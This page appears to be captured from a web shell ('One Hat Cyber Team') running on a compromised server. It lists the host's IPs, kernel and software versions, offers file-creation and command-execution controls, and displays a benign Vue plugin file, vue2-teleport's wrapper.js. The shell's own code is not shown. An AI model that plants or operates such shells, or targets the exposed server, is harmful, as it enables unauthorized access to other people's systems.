⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
node_modules
/
vue2-teleport
/
src
/
View File Name :
wrapper.js
// Taken from https://vuejs.org/v2/cookbook/packaging-sfc-for-npm.html // Import vue component import component from './Teleport.vue'; // Declare install function executed by Vue.use() export function install (Vue) { if (install.installed) return; install.installed = true; Vue.component('Teleport', component); } // Create module definition for Vue.use() const plugin = { install, }; // Auto-install when vue is found (eg. in browser via <script> tag) let GlobalVue = null; if (typeof window !== 'undefined') { GlobalVue = window.Vue; } else if (typeof global !== 'undefined') { GlobalVue = global.Vue; } if (GlobalVue) { GlobalVue.use(plugin); } // To allow use as module (npm/webpack/etc.) export component export default component;